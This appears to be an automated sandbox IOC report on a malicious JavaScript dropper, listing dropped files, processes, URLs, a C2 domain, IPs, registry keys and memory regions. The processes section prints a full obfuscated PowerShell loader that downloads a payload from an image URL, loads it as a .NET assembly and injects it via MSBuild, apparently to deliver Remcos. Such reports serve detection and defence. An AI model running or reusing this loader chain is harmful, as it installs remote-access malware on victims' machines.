IOC Report
NewOrder12052024.js

loading gif

Files

File Path
Type
Category
Malicious
NewOrder12052024.js
Unicode text, UTF-16, little-endian text, with very long lines (479), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\octaves.js
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\8Mvet[1].txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdwmd3el.n0q.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ekadcubq.u5d.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ijah4sag.mzc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oct2t54n.jun.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NewOrder12052024.js"
malicious
C:\Windows\System32\cscript.exe
"C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Local\Temp\octaves.js
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $lyophilizers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABwAG8AcwBzAGUAcwBzAGkAdgBlAG4AZQBzAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABwAHIAZQBvAGMAYwB1AHAAaQBlAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAGQAYQB2AGUAcgBpAG4AZQBzACAAPQAgACQAcAByAGUAbwBjAGMAdQBwAGkAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHAAbwBzAHMAZQBzAHMAaQB2AGUAbgBlAHMAcwApADsAJABuAHkAbQBwAGgAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQBkAGEAdgBlAHIAaQBuAGUAcwApADsAJABsAGUAeABpAGMAYQBsAGkAegBlAHMAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgB2AG8AeQBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAbABpAHAAZAByAGUAcwBzACAAPQAgACQAbgB5AG0AcABoAHMALgBJAG4AZABlAHgATwBmACgAJABsAGUAeABpAGMAYQBsAGkAegBlAHMAKQA7ACQAdABoAHIAdQBzAGgAZQBzACAAPQAgACQAbgB5AG0AcABoAHMALgBJAG4AZABlAHgATwBmACgAJABlAG4AdgBvAHkAcwApADsAJABzAGwAaQBwAGQAcgBlAHMAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAHQAaAByAHUAcwBoAGUAcwAgAC0AZwB0ACAAJABzAGwAaQBwAGQAcgBlAHMAcwA7ACQAcwBsAGkAcABkAHIAZQBzAHMAIAArAD0AIAAkAGwAZQB4AGkAYwBhAGwAaQB6AGUAcwAuAEwAZQBuAGcAdABoADsAJABmAGUAcgBtAGkAbwBuAHMAIAA9ACAAJAB0AGgAcgB1AHMAaABlAHMAIAAtACAAJABzAGwAaQBwAGQAcgBlAHMAcwA7ACQAZAByAGUAYQBtAGkAZQByACAAPQAgACQAbgB5AG0AcABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwBsAGkAcABkAHIAZQBzAHMALAAgACQAZgBlAHIAbQBpAG8AbgBzACkAOwAkAG8AcgBnAGEAbgBpAHoAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAJABkAHIAZQBhAG0AaQBlAHIALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAkAF8AIAB9ACkAWwAtADEALgAuAC0AKAAkAGQAcgBlAGEAbQBpAGUAcgAuAEwAZQBuAGcAdABoACkAXQA7ACQAcgBlAGIAYQB0AG8AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGcAYQBuAGkAegBlAGQAKQA7ACQAZQB0AHkAbQBvAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAcgBlAGIAYQB0AG8AKQA7ACQAZQBwAGkAZABvAHQAZQAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkAOwAkAGUAcABpAGQAbwB0AGUALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAQAAoACcAMAAvAFgAbwBSAGUAUAAvAHIALwBlAGUALgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoACcALAAgACcAawBhAGYAdABhAG4AJwAsACAAJwBrAGEAZgB0AGEAbgAnACwAIAAnAGsAYQBmAHQAYQBuACcALAAgACcATQBTAEIAdQBpAGwAZAAnACwAIAAnAGsAYQBmAHQAYQBuACcALAAgACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAMQAnACwAJwBrAGEAZgB0AGEAbgAnACkAKQA7AGkAZgAgACgAJABuAHUAbABsACAALQBuAGUAIAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAgAC0AYQBuAGQAIAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABbAHYAbwBpAGQAXQAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAAfQAgAGUAbABzAGUAIAB7ACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAnAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2AGUAcgBzAGkAbwBuACAATgBvAHQAIABhAHYAYQBpAGwAYQBiAGwAZQAnACAAfQA7AGkAZgAgACgAJABuAHUAbABsACAALQBuAGUAIAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAgAC0AYQBuAGQAIAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABbAHYAbwBpAGQAXQAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAAfQAgAGUAbABzAGUAIAB7ACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAnAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2AGUAcgBzAGkAbwBuACAATgBvAHQAIABhAHYAYQBpAGwAYQBiAGwAZQAnACAAfQA7AA==';$atones = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($lyophilizers));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $atones
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$possessiveness = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$preoccupies = New-Object System.Net.WebClient;$cadaverines = $preoccupies.DownloadData($possessiveness);$nymphs = [System.Text.Encoding]::UTF8.GetString($cadaverines);$lexicalizes = '<<BASE64_START>>';$envoys = '<<BASE64_END>>';$slipdress = $nymphs.IndexOf($lexicalizes);$thrushes = $nymphs.IndexOf($envoys);$slipdress -ge 0 -and $thrushes -gt $slipdress;$slipdress += $lexicalizes.Length;$fermions = $thrushes - $slipdress;$dreamier = $nymphs.Substring($slipdress, $fermions);$organized = -join ($dreamier.ToCharArray() | ForEach-Object { $_ })[-1..-($dreamier.Length)];$rebato = [System.Convert]::FromBase64String($organized);$etymon = [System.Reflection.Assembly]::Load($rebato);$epidote = [dnlib.IO.Home].GetMethod('VAI');$epidote.Invoke($null, @('0/XoReP/r/ee.etsap//:sptth', 'kaftan', 'kaftan', 'kaftan', 'MSBuild', 'kaftan', 'kaftan','kaftan','kaftan','kaftan','kaftan','kaftan','1','kaftan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
jawa123.duckdns.org
malicious
http://geoplugin.net/json.gpf
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX
unknown
http://geoplugin.net/json.gp)
unknown
http://geoplugin.net/json.gp3c
unknown
https://www.google.com;
unknown
https://analytics.paste.ee
unknown
https://aka.ms/pscore6
unknown
https://paste.ee/d/8Mvet
172.67.187.200
https://paste.ee/r/PeRoX/0
172.67.187.200
https://github.com/Pester/Pester
unknown
https://paste.ee/d/8Mvet8
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://www.google.com
unknown
https://res.cloudinary.com
unknown
http://geoplugin.net/json.gp/C
unknown
https://paste.ee/
unknown
https://analytics.paste.ee;
unknown
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
unknown
There are 17 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
jawa123.duckdns.org
154.216.20.244
malicious
paste.ee
172.67.187.200
geoplugin.net
178.237.33.50
res.cloudinary.com
unknown

IPs

IP
Domain
Country
Malicious
154.216.20.244
jawa123.duckdns.org
Seychelles
malicious
172.67.187.200
paste.ee
United States
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\cscript.exe
JScriptSetScriptStateStarted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\net-YA1YXM
exepath
HKEY_CURRENT_USER\SOFTWARE\net-YA1YXM
licence
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
FB5000
heap
page read and write
malicious
2BFF000
stack
page read and write
malicious
F68000
heap
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
246C0337000
heap
page read and write
246C0326000
heap
page read and write
246C019B000
heap
page read and write
246C05E6000
heap
page read and write
7FFB49F90000
trusted library allocation
page read and write
246C0330000
heap
page read and write
22BCDFD6000
heap
page read and write
295001D1000
trusted library allocation
page read and write
22BCD804000
heap
page read and write
7FFB49E30000
trusted library allocation
page execute and read and write
246C0659000
heap
page read and write
246C01F3000
heap
page read and write
246BE3C9000
heap
page read and write
23C4EFC000
stack
page read and write
246BE2F0000
heap
page read and write
A5D367E000
stack
page read and write
246BE2FA000
heap
page read and write
295005A8000
trusted library allocation
page read and write
35FD000
stack
page read and write
7FFB49E90000
trusted library allocation
page read and write
29502DBC000
trusted library allocation
page read and write
A5D3BFE000
stack
page read and write
3AFB000
stack
page read and write
246C02FD000
heap
page read and write
13380069000
trusted library allocation
page read and write
133E98F0000
trusted library allocation
page read and write
22BCBA45000
heap
page read and write
246C0657000
heap
page read and write
29500050000
heap
page readonly
13380096000
trusted library allocation
page read and write
FD0000
heap
page read and write
246C033E000
heap
page read and write
246C014C000
heap
page read and write
246BE422000
heap
page read and write
246C032F000
heap
page read and write
246C0156000
heap
page read and write
2AF0000
heap
page read and write
22BCB9B6000
heap
page read and write
246C05DC000
heap
page read and write
22BCDFD5000
heap
page read and write
246BE290000
heap
page read and write
22BCDFFE000
heap
page read and write
FB3000
heap
page read and write
246C0683000
heap
page read and write
246C0320000
heap
page read and write
246C01D4000
heap
page read and write
133E9900000
heap
page readonly
246C031F000
heap
page read and write
22BCD808000
heap
page read and write
246BE420000
heap
page read and write
246C031F000
heap
page read and write
7FFB49D26000
trusted library allocation
page read and write
133EA1D0000
heap
page read and write
F60000
heap
page read and write
CDDA8FF000
stack
page read and write
22BCBB10000
heap
page read and write
22BCB8E0000
heap
page read and write
22BCE0CE000
heap
page read and write
246C0130000
heap
page read and write
22BCBB4B000
heap
page read and write
133E8059000
heap
page read and write
246BE420000
heap
page read and write
29500040000
trusted library allocation
page read and write
7FFB49C80000
trusted library allocation
page read and write
22BCD460000
heap
page read and write
29500020000
trusted library allocation
page read and write
246C0634000
heap
page read and write
246C01A4000
heap
page read and write
246C0661000
heap
page read and write
DE0000
heap
page read and write
133E9EE9000
heap
page read and write
22BCBB20000
heap
page read and write
22BCB9EC000
heap
page read and write
246C01E8000
heap
page read and write
246C0683000
heap
page read and write
246C05EC000
heap
page read and write
246C061F000
heap
page read and write
295037BC000
trusted library allocation
page read and write
22BCE0CE000
heap
page read and write
246C05E8000
heap
page read and write
FA7000
heap
page read and write
1338004F000
trusted library allocation
page read and write
295001C0000
heap
page execute and read and write
133EA1E8000
heap
page read and write
246C05F0000
heap
page read and write
7FFB49D30000
trusted library allocation
page execute and read and write
246C0630000
heap
page read and write
246C0146000
heap
page read and write
22BCB7E0000
heap
page read and write
7FFB49EF0000
trusted library allocation
page read and write
22BCB9D1000
heap
page read and write
246C0152000
heap
page read and write
13380415000
trusted library allocation
page read and write
22BCE0BC000
heap
page read and write
BBCFD27000
stack
page read and write
F1E000
stack
page read and write
133E9ED0000
heap
page read and write
13380446000
trusted library allocation
page read and write
246C0148000
heap
page read and write
246C0306000
heap
page read and write
22BCB990000
heap
page read and write
246C032D000
heap
page read and write
1338012A000
trusted library allocation
page read and write
246C014F000
heap
page read and write
246C064E000
heap
page read and write
22BCE0AA000
heap
page read and write
BBD06FE000
stack
page read and write
246BE2C0000
heap
page read and write
475000
remote allocation
page execute and read and write
22BCBA03000
heap
page read and write
22BCBA36000
heap
page read and write
471000
remote allocation
page execute and read and write
22BCE1F7000
heap
page read and write
13380429000
trusted library allocation
page read and write
133E9A45000
heap
page read and write
22BCDFD0000
heap
page read and write
246C02F9000
heap
page read and write
22BCBA32000
heap
page read and write
22BCD7F5000
heap
page read and write
295005B0000
trusted library allocation
page read and write
133E9A40000
heap
page read and write
246C05D8000
heap
page read and write
22BCE000000
heap
page read and write
246BE351000
heap
page read and write
246C030F000
heap
page read and write
7FFB49EE0000
trusted library allocation
page read and write
A5D38F8000
stack
page read and write
CDDABFE000
stack
page read and write
246C015C000
heap
page read and write
133E99C7000
heap
page execute and read and write
295069BC000
trusted library allocation
page read and write
246C01D8000
heap
page read and write
35BF000
stack
page read and write
246BE35C000
heap
page read and write
22BCD7F3000
heap
page read and write
246C0323000
heap
page read and write
246BE34C000
heap
page read and write
133E804B000
heap
page read and write
7FFB49F60000
trusted library allocation
page read and write
246C031B000
heap
page read and write
295005BC000
trusted library allocation
page read and write
246C0614000
heap
page read and write
246C0624000
heap
page read and write
246C0148000
heap
page read and write
246C0311000
heap
page read and write
133E7EB0000
heap
page read and write
133E7FBA000
heap
page read and write
1338058E000
trusted library allocation
page read and write
29500177000
heap
page execute and read and write
246BE2FA000
heap
page read and write
246C033E000
heap
page read and write
133EA0C0000
heap
page execute and read and write
22BCBA01000
heap
page read and write
246C05D6000
heap
page read and write
246C0609000
heap
page read and write
7DF437AC0000
trusted library allocation
page execute and read and write
246C0318000
heap
page read and write
246C0683000
heap
page read and write
22BCBA32000
heap
page read and write
246BE41A000
heap
page read and write
246C02EC000
heap
page read and write
FD8000
heap
page read and write
246BE35A000
heap
page read and write
23C507F000
stack
page read and write
246C062B000
heap
page read and write
22BCBA3C000
heap
page read and write
133E7F20000
heap
page read and write
BBD08FE000
stack
page read and write
36FE000
stack
page read and write
246C0301000
heap
page read and write
2A3C000
stack
page read and write
22BCE0D0000
heap
page read and write
22BCE004000
heap
page read and write
22BCD490000
heap
page read and write
246C0301000
heap
page read and write
9CC000
stack
page read and write
22BCE0CE000
heap
page read and write
22BCB9B5000
heap
page read and write
2CFF000
stack
page read and write
22BCD7F0000
heap
page read and write
246BE2F5000
heap
page read and write
246C0174000
heap
page read and write
7FFB49C7D000
trusted library allocation
page execute and read and write
246C033E000
heap
page read and write
13390010000
trusted library allocation
page read and write
A5D36FD000
stack
page read and write
1338050B000
trusted library allocation
page read and write
7FFB49D56000
trusted library allocation
page execute and read and write
246BE35B000
heap
page read and write
246C0318000
heap
page read and write
22BCE0CE000
heap
page read and write
246C0138000
heap
page read and write
A5D3A7C000
stack
page read and write
246C0136000
heap
page read and write
22BCE0CE000
heap
page read and write
29500251000
trusted library allocation
page read and write
22BCDFFE000
heap
page read and write
22BCBA32000
heap
page read and write
34BE000
stack
page read and write
246C02B7000
heap
page read and write
246C014F000
heap
page read and write
22BCE0CE000
heap
page read and write
23C537E000
stack
page read and write
246C0602000
heap
page read and write
246C032F000
heap
page read and write
246C0160000
heap
page read and write
246C05D8000
heap
page read and write
22BCB9BF000
heap
page read and write
1338054C000
trusted library allocation
page read and write
22BCDFFC000
heap
page read and write
246C033D000
heap
page read and write
246C01DA000
heap
page read and write
246C0301000
heap
page read and write
246C0323000
heap
page read and write
23C50FE000
stack
page read and write
7FFB49D2C000
trusted library allocation
page execute and read and write
A5D377F000
stack
page read and write
29507DBC000
trusted library allocation
page read and write
23C4F7F000
stack
page read and write
13380401000
trusted library allocation
page read and write
246C030B000
heap
page read and write
7FFB49F30000
trusted library allocation
page read and write
22BCD8F0000
remote allocation
page read and write
22BCBA01000
heap
page read and write
22BCBA29000
heap
page read and write
22BCB9EC000
heap
page read and write
246C05D0000
heap
page read and write
246C05D1000
heap
page read and write
246C013B000
heap
page read and write
246C0300000
heap
page read and write
133E7ED0000
heap
page read and write
2ABE000
stack
page read and write
A5D32A3000
stack
page read and write
246BE415000
heap
page read and write
22BCBA8A000
heap
page read and write
22BCDFEE000
heap
page read and write
246C013D000
heap
page read and write
A5D33AE000
stack
page read and write
246BE426000
heap
page read and write
133E9EF1000
heap
page read and write
246C05D1000
heap
page read and write
295005B8000
trusted library allocation
page read and write
246C060E000
heap
page read and write
295019BC000
trusted library allocation
page read and write
246BE35F000
heap
page read and write
246C01DF000
heap
page read and write
246C01F3000
heap
page read and write
246BE360000
heap
page read and write
246C0326000
heap
page read and write
246C0163000
heap
page read and write
7FFB49C72000
trusted library allocation
page read and write
246C019B000
heap
page read and write
22BCE069000
heap
page read and write
22BCE1F8000
heap
page read and write
2A7E000
stack
page read and write
A5D474D000
stack
page read and write
133E7F25000
heap
page read and write
23C54FB000
stack
page read and write
133E7FC2000
heap
page read and write
246C05F6000
heap
page read and write
22BCBA35000
heap
page read and write
133EA050000
heap
page execute and read and write
246C03B7000
heap
page read and write
246C014A000
heap
page read and write
133E7FBC000
heap
page read and write
246C0180000
heap
page read and write
22BCB9E5000
heap
page read and write
133E804D000
heap
page read and write
246BE2F8000
heap
page read and write
246C014B000
heap
page read and write
FC3000
heap
page read and write
BBD05FE000
stack
page read and write
22BCBA32000
heap
page read and write
246C0156000
heap
page read and write
22BCE0BC000
heap
page read and write
133E7F30000
heap
page read and write
22BCBA8A000
heap
page read and write
7FFB49E80000
trusted library allocation
page read and write
246C05D2000
heap
page read and write
22BCD7F7000
heap
page read and write
133803D4000
trusted library allocation
page read and write
3B3E000
stack
page read and write
373E000
stack
page read and write
1339006E000
trusted library allocation
page read and write
A5D3AFE000
stack
page read and write
246C0339000
heap
page read and write
7FFB49F40000
trusted library allocation
page read and write
246C02B9000
heap
page read and write
22BCE0BA000
heap
page read and write
13380119000
trusted library allocation
page read and write
1338066C000
trusted library allocation
page read and write
A5D37FE000
stack
page read and write
246BE339000
heap
page read and write
246C0607000
heap
page read and write
133E99C0000
heap
page execute and read and write
246C0136000
heap
page read and write
22BCD800000
heap
page read and write
22BCBA7D000
heap
page read and write
BBD07FB000
stack
page read and write
246BE35A000
heap
page read and write
2DFF000
stack
page read and write
246BE2FE000
heap
page read and write
246C0639000
heap
page read and write
7FFB49C74000
trusted library allocation
page read and write
22BCB9D1000
heap
page read and write
7FFB49E21000
trusted library allocation
page read and write
13380127000
trusted library allocation
page read and write
22BCBA7D000
heap
page read and write
246C0137000
heap
page read and write
7FFB49E52000
trusted library allocation
page read and write
22BCBA8A000
heap
page read and write
1070000
heap
page read and write
295073BC000
trusted library allocation
page read and write
133E9F95000
heap
page read and write
23C4CFE000
stack
page read and write
BBCFD25000
stack
page read and write
7FFB49F50000
trusted library allocation
page read and write
7FFB49E2A000
trusted library allocation
page read and write
13380113000
trusted library allocation
page read and write
13380116000
trusted library allocation
page read and write
133EA520000
heap
page read and write
246C02E5000
heap
page read and write
246BE2A0000
heap
page read and write
7FFB49F80000
trusted library allocation
page read and write
246C05E1000
heap
page read and write
246BE41B000
heap
page read and write
295005AA000
trusted library allocation
page read and write
A5D3977000
stack
page read and write
7FFB49E40000
trusted library allocation
page execute and read and write
22BCBA29000
heap
page read and write
133E7F70000
heap
page read and write
22BCD7FB000
heap
page read and write
246C01E3000
heap
page read and write
22BCD8F0000
remote allocation
page read and write
22BCBB45000
heap
page read and write
246C0148000
heap
page read and write
7FFB49ED0000
trusted library allocation
page read and write
246C015B000
heap
page read and write
22BCB9C0000
heap
page read and write
13380660000
trusted library allocation
page read and write
22BCE207000
heap
page read and write
246C0133000
heap
page read and write
246C0157000
heap
page read and write
246BE2FE000
heap
page read and write
7FFB49D20000
trusted library allocation
page read and write
133E7FD4000
heap
page read and write
23C4FFE000
stack
page read and write
133803ED000
trusted library allocation
page read and write
22BCD808000
heap
page read and write
246C015C000
heap
page read and write
A5D3B7F000
stack
page read and write
22BCBA31000
heap
page read and write
246C015C000
heap
page read and write
2EFF000
stack
page read and write
A5D33EE000
stack
page read and write
246BE2F8000
heap
page read and write
22BCD8F0000
remote allocation
page read and write
133E9980000
trusted library allocation
page read and write
246C0190000
heap
page read and write
CDDACFF000
stack
page read and write
22BCBA03000
heap
page read and write
7FFB49EA0000
trusted library allocation
page read and write
22BCBA7D000
heap
page read and write
246C064A000
heap
page read and write
22BCBA37000
heap
page read and write
295003F3000
trusted library allocation
page read and write
22BCBB4E000
heap
page read and write
246C02F9000
heap
page read and write
7FFB49E60000
trusted library allocation
page execute and read and write
13380001000
trusted library allocation
page read and write
133E7F60000
trusted library allocation
page read and write
246C0602000
heap
page read and write
246C0168000
heap
page read and write
246C02BD000
heap
page read and write
246BE3BE000
heap
page read and write
22BCE000000
heap
page read and write
246BE372000
heap
page read and write
246C0153000
heap
page read and write
246C0317000
heap
page read and write
22BCE06E000
heap
page read and write
22BCE007000
heap
page read and write
246C02B8000
heap
page read and write
29500170000
heap
page execute and read and write
22BCBB40000
heap
page read and write
A5D46CE000
stack
page read and write
133800A1000
trusted library allocation
page read and write
246C05FA000
heap
page read and write
22BCBA3B000
heap
page read and write
A5D39FC000
stack
page read and write
22BCBA8A000
heap
page read and write
22BCB9D1000
heap
page read and write
133E9FAF000
heap
page read and write
246C015C000
heap
page read and write
22BCD7F5000
heap
page read and write
246C0683000
heap
page read and write
246C0330000
heap
page read and write
246C032A000
heap
page read and write
22BCD7F1000
heap
page read and write
23C517E000
stack
page read and write
1338051B000
trusted library allocation
page read and write
246C065C000
heap
page read and write
22BCE0BA000
heap
page read and write
246C0333000
heap
page read and write
29500070000
heap
page read and write
246C0133000
heap
page read and write
133E9F3C000
heap
page read and write
246C0306000
heap
page read and write
246BE420000
heap
page read and write
246BE2FB000
heap
page read and write
246C019B000
heap
page read and write
22BCB9E2000
heap
page read and write
246C068A000
heap
page read and write
246C0324000
heap
page read and write
22BCBB4E000
heap
page read and write
22BCE1D2000
heap
page read and write
246C02BE000
heap
page read and write
133E9F3A000
heap
page read and write
